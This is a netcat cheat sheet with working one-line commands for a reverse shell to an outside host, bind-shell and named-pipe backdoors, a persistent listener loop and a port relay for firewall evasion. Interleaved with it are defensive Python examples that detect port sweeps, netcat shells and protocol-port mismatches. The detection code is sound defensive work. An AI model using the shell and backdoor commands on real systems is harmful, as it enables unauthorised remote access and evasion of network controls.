Netcat
Netcat rocks my socks

Basics

Connect to a socket on host 192.168.1.1 on TCP port 81
    nc 192.168.1.1 81

Listen on the local machine for inbound TCP connections on port 81
    nc -nvlp 81

Reverse shell sent to host 10.0.0.2 over TCP port 53
    nc 10.0.0.2 53 -e /bin/bash

Backdoor listening on TCP 80 set to execute cmd.exe when connected
    nc -nvlp 80 -e cmd.exe

More Fancy

Attempt to connect to each TCP port from 10 through 90 on 10.0.0.1: -n skips name resolution, -v reports each result, -z sends no data (it only checks whether the port accepts a connection), and -w1 waits at most 1 second per connection attempt
    nc -nvzw1 10.0.0.1 10-90
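What that sweep looks like from the target's side, as an added example that is not part of the original cheat sheet: a connect scan with -z and -w1 leaves one TCP SYN per probed port in the firewall log, so grouping SYNs per source/destination pair and counting distinct destination ports inside a short window picks it out. The iptables-style log lines below are constructed sample data, and the 60-second window and 20-port threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches the iptables/nftables LOG line format for TCP packets carrying the SYN flag.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ kernel: .*?"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=TCP .*?DPT=(?P<dpt>\d+) .*?\bSYN\b"
)


def make_line(ts, src, dst, spt, dpt):
    """Build one constructed log line in iptables LOG format (sample data, not real traffic)."""
    return (f"{ts.strftime('%b %d %H:%M:%S')} fw kernel: IN=eth0 OUT= MAC=00:00:00:00:00:00 "
            f"SRC={src} DST={dst} LEN=60 TTL=64 ID=0 DF PROTO=TCP SPT={spt} DPT={dpt} "
            f"WINDOW=64240 RES=0x00 SYN URGP=0")


BASE = datetime(2024, 1, 10, 12, 0, 1)

# Constructed sample: a sweep of ports 10-90 on 10.0.0.1 from 10.0.0.5, one probe per second
# (the trace "nc -nvzw1 10.0.0.1 10-90" leaves behind), plus ordinary traffic from 10.0.0.7.
SAMPLE_LOG = [make_line(BASE + timedelta(seconds=i), "10.0.0.5", "10.0.0.1", 41000 + i, 10 + i)
              for i in range(81)]
SAMPLE_LOG += [
    make_line(BASE + timedelta(seconds=5), "10.0.0.7", "10.0.0.1", 50001, 22),
    make_line(BASE + timedelta(seconds=9), "10.0.0.7", "10.0.0.1", 50002, 80),
    make_line(BASE + timedelta(seconds=40), "10.0.0.7", "10.0.0.1", 50003, 80),
    # A non-SYN packet: must be ignored by the parser.
    "Jan 10 12:00:44 fw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 PROTO=TCP SPT=50003 DPT=80 ACK URGP=0",
]


def detect_port_sweeps(lines, window_seconds=60, min_ports=20):
    """Return one alert per (src, dst) pair whose SYNs touched at least `min_ports`
    distinct destination ports inside some `window_seconds` window."""
    events = defaultdict(list)  # (src, dst) -> [(timestamp, dport)]
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # not a TCP SYN log line
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        events[(m["src"], m["dst"])].append((ts, int(m["dpt"])))

    alerts = []
    for (src, dst), hits in events.items():
        hits.sort()
        best, start = 0, 0
        for end in range(len(hits)):  # sliding window over time-ordered hits
            while (hits[end][0] - hits[start][0]).total_seconds() > window_seconds:
                start += 1
            best = max(best, len({port for _, port in hits[start:end + 1]}))
        if best >= min_ports:
            alerts.append({"src": src, "dst": dst, "distinct_ports": best,
                           "lo": min(p for _, p in hits), "hi": max(p for _, p in hits)})
    return alerts


if __name__ == "__main__":
    for a in detect_port_sweeps(SAMPLE_LOG):
        print(f"port sweep: {a['src']} -> {a['dst']} ports {a['lo']}-{a['hi']} "
              f"({a['distinct_ports']} distinct within 60s)")
```

The threshold is deliberately a count of distinct ports rather than of packets, so a busy but legitimate client that reconnects to the same two services many times does not trip it.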
Netcat stops listening once the connection drops or is terminated, which makes getting another shell back annoying. Wrapping nc in an endless bash loop is an easy way around this; start it under nohup as well so it survives the parent terminal closing.
    while [ 1 ]; do echo "started"; nc -l -p 1234 -e /bin/sh; done
Netcat relay: everything received on local TCP port 4321 is forwarded to 10.0.0.1 on TCP port 8123. Note that this plain pipe is one-way; replies from 10.0.0.1 are not sent back to the original client. For a two-way relay use a named pipe, as in the Firewall Evasion section.
    nc -l -p 4321 | nc 10.0.0.1 8123
Create a netcat backdoor on a build without -e support. A named pipe (a FIFO; mkfifo backpipe does the same as mknod backpipe p) funnels data between bash and nc: whatever nc receives is written to the pipe and read as bash's stdin, and bash's output is piped back into nc.
    mknod backpipe p
    /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
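How a defender picks the patterns from the Basics section (nc with -e as bind or reverse shell) and the two entries above (the nc|nc relay and the -e-less named-pipe backdoor) out of a process snapshot, as an added example that is not from this cheat sheet. Shell redirections such as 0<backpipe never appear in a process's argument list, so the argument-level check only finds the -e form; the named-pipe and relay forms need the file-descriptor view, which is what stat on /proc/<pid>/fd/0 and /proc/<pid>/fd/1 would report. The snapshot below is constructed, and its pids, paths and pipe inodes are assumptions.

```python
import os

# Binaries that behave as netcat; the basename of argv[0] is compared against this set.
NC_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
EXEC_LONG = ("--exec", "--sh-exec")  # ncat's long forms of -e / -c

# Constructed process snapshot: what `ps -eo pid,args` plus the type and target of
# /proc/<pid>/fd/0 and /proc/<pid>/fd/1 would show. "fifo" is a named pipe on disk,
# "pipe" an anonymous pipe created by the shell's `|`, "chr" a terminal or /dev/null.
PROCS = [
    {"pid": 1201, "args": ["/usr/sbin/sshd", "-D"],
     "fds": {0: ("chr", "/dev/null"), 1: ("chr", "/dev/null")}},
    {"pid": 1337, "args": ["nc", "-nvlp", "80", "-e", "/bin/bash"],      # bind shell
     "fds": {0: ("chr", "/dev/pts/1"), 1: ("chr", "/dev/pts/1")}},
    {"pid": 1400, "args": ["nc", "10.0.0.2", "53", "-e", "/bin/bash"],   # reverse shell
     "fds": {0: ("chr", "/dev/pts/1"), 1: ("chr", "/dev/pts/1")}},
    {"pid": 1500, "args": ["/bin/bash"],                                 # /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
     "fds": {0: ("fifo", "/tmp/backpipe"), 1: ("pipe", "pipe:[9001]")}},
    {"pid": 1501, "args": ["nc", "-l", "-p", "8080"],
     "fds": {0: ("pipe", "pipe:[9001]"), 1: ("fifo", "/tmp/backpipe")}},
    {"pid": 1600, "args": ["nc", "-l", "-p", "4321"],                    # nc -l -p 4321 | nc 10.0.0.1 8123
     "fds": {0: ("chr", "/dev/pts/2"), 1: ("pipe", "pipe:[9100]")}},
    {"pid": 1601, "args": ["nc", "10.0.0.1", "8123"],
     "fds": {0: ("pipe", "pipe:[9100]"), 1: ("chr", "/dev/pts/2")}},
    {"pid": 1700, "args": ["nc", "-zv", "mail.example", "25"],           # plain connectivity check
     "fds": {0: ("chr", "/dev/pts/3"), 1: ("chr", "/dev/pts/3")}},
    {"pid": 1800, "args": ["vim", "nc-notes.txt"],                       # not netcat at all
     "fds": {0: ("chr", "/dev/pts/3"), 1: ("chr", "/dev/pts/3")}},
]


def is_netcat(args):
    return bool(args) and os.path.basename(args[0]) in NC_NAMES


def short_flags(args):
    """Letters from short-option clusters such as '-nvlp' or '-e'; long options are excluded."""
    letters = set()
    for tok in args[1:]:
        if len(tok) > 1 and tok[0] == "-" and tok[1] != "-":
            letters.update(tok[1:])
    return letters


def audit(procs):
    """Findings for netcat processes that run a program, sit on a named pipe, or chain into another nc."""
    findings = []
    pipe_ends = {}  # anonymous pipe inode -> {pid: fd number holding that end}
    for p in procs:
        if not is_netcat(p["args"]):
            continue
        flags = short_flags(p["args"])
        runs_program = ("e" in flags or "c" in flags
                        or any(a.split("=")[0] in EXEC_LONG for a in p["args"]))
        if runs_program:
            listening = "l" in flags or "--listen" in p["args"]
            findings.append({"pid": p["pid"],
                             "kind": "exec_bind_shell" if listening else "exec_reverse_shell",
                             "detail": " ".join(p["args"])})
        for fd in (0, 1):
            kind, target = p["fds"].get(fd, ("", ""))
            if kind == "fifo":  # stdin or stdout wired to a FIFO on disk: the backpipe construction
                findings.append({"pid": p["pid"], "kind": "fifo_backdoor", "detail": f"fd{fd} -> {target}"})
                break
            if kind == "pipe":
                pipe_ends.setdefault(target, {})[p["pid"]] = fd
    # Two nc processes on one anonymous pipe, one writing (fd 1) and one reading (fd 0): a relay.
    for inode, ends in pipe_ends.items():
        if set(ends.values()) == {0, 1}:
            writer = next(pid for pid, fd in ends.items() if fd == 1)
            reader = next(pid for pid, fd in ends.items() if fd == 0)
            findings.append({"pid": writer, "kind": "relay",
                             "detail": f"stdout of pid {writer} feeds stdin of nc pid {reader} via {inode}"})
    return sorted(findings, key=lambda f: (f["pid"], f["kind"]))


if __name__ == "__main__":
    for f in audit(PROCS):
        print(f"pid {f['pid']:>5}  {f['kind']:<19} {f['detail']}")
```

The -z connectivity check (pid 1700) and the editor with "nc" in a filename are left alone, which is the point of keying on what nc is wired to rather than on the name alone.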

Firewall Evasion

If a specific port is blocked at the firewall, netcat can relay a service through a port that is allowed. The named pipe carries the replies back to the listening nc, so this relay works in both directions; here SSH on 127.0.0.1:22 is exposed on TCP port 80
    mknod mypipe p
    nc -lp 80 < mypipe | nc 127.0.0.1 22 > mypipe
    ssh [email protected] -p 80 # Attacker command to connect to ssh piped through port 80
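The relay changes the port SSH arrives on but not the protocol: nc copies bytes verbatim, so the clear-text SSH version banner still crosses the wire, now on port 80, and a protocol-versus-port check catches it. The following is an added example, not from the original cheat sheet, that classifies flow records by the first bytes each side sent and flags ports carrying something other than the protocol expected there. The port baseline table and the flow records are constructed assumptions; the classification goes beyond the SSH case to HTTP and TLS so the same check covers a web proxy parked on 22.

```python
# Expected application protocol per destination port (a site baseline, constructed for this example).
EXPECTED = {22: "ssh", 80: "http", 443: "tls", 8080: "http"}
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"CONNECT ")


def identify(payload):
    """Guess the application protocol from the first bytes one peer sent."""
    if payload.startswith(b"SSH-"):
        return "ssh"  # RFC 4253 identification string, sent in clear by both sides
    if payload.startswith(HTTP_METHODS) or payload.startswith(b"HTTP/"):
        return "http"
    if len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03 and payload[2] <= 0x04:
        return "tls"  # TLS record header: handshake content type, protocol version 3.x
    return "unknown"


def find_mismatches(flows):
    """Flag flows whose first bytes, in either direction, carry a protocol other than
    the one expected on that destination port. Ports without a baseline are skipped."""
    alerts = []
    for f in flows:
        expected = EXPECTED.get(f["dport"])
        if expected is None:
            continue
        for side in ("client", "server"):
            observed = identify(f.get(side, b""))
            if observed not in ("unknown", expected):
                alerts.append({"src": f["src"], "dst": f["dst"], "dport": f["dport"],
                               "side": side, "observed": observed, "expected": expected})
                break  # one alert per flow is enough
    return alerts


# Constructed flow records (first bytes in each direction), not captured traffic.
FLOWS = [
    {"src": "10.0.0.9", "dst": "10.0.0.1", "dport": 80,
     "client": b"GET / HTTP/1.1\r\nHost: 10.0.0.1\r\n\r\n", "server": b"HTTP/1.1 200 OK\r\n"},
    {"src": "10.0.0.9", "dst": "10.0.0.1", "dport": 80,      # SSH relayed over port 80
     "client": b"SSH-2.0-OpenSSH_9.2\r\n", "server": b"SSH-2.0-OpenSSH_8.9p1\r\n"},
    {"src": "10.0.0.9", "dst": "10.0.0.1", "dport": 22,
     "client": b"SSH-2.0-OpenSSH_9.2\r\n", "server": b"SSH-2.0-OpenSSH_8.9p1\r\n"},
    {"src": "10.0.0.9", "dst": "10.0.0.1", "dport": 443,
     "client": b"\x16\x03\x01\x00\xc4\x01\x00\x00\xc0\x03\x03", "server": b"\x16\x03\x03\x00\x5a\x02"},
    {"src": "10.0.0.9", "dst": "10.0.0.1", "dport": 22,      # HTTP proxy parked on 22
     "client": b"CONNECT example.org:443 HTTP/1.1\r\n", "server": b"HTTP/1.1 200 Connection established\r\n"},
    {"src": "10.0.0.9", "dst": "10.0.0.1", "dport": 5000,    # no baseline for this port: ignored
     "client": b"GET /status HTTP/1.1\r\n", "server": b"HTTP/1.1 200 OK\r\n"},
]


if __name__ == "__main__":
    for a in find_mismatches(FLOWS):
        print(f"{a['src']} -> {a['dst']}:{a['dport']} {a['side']} speaks {a['observed']}, "
              f"expected {a['expected']}")
```

Checking both directions matters for the relay case: even if a client's first bytes were lost, the server banner that nc forwards from 127.0.0.1:22 is still identified on its own.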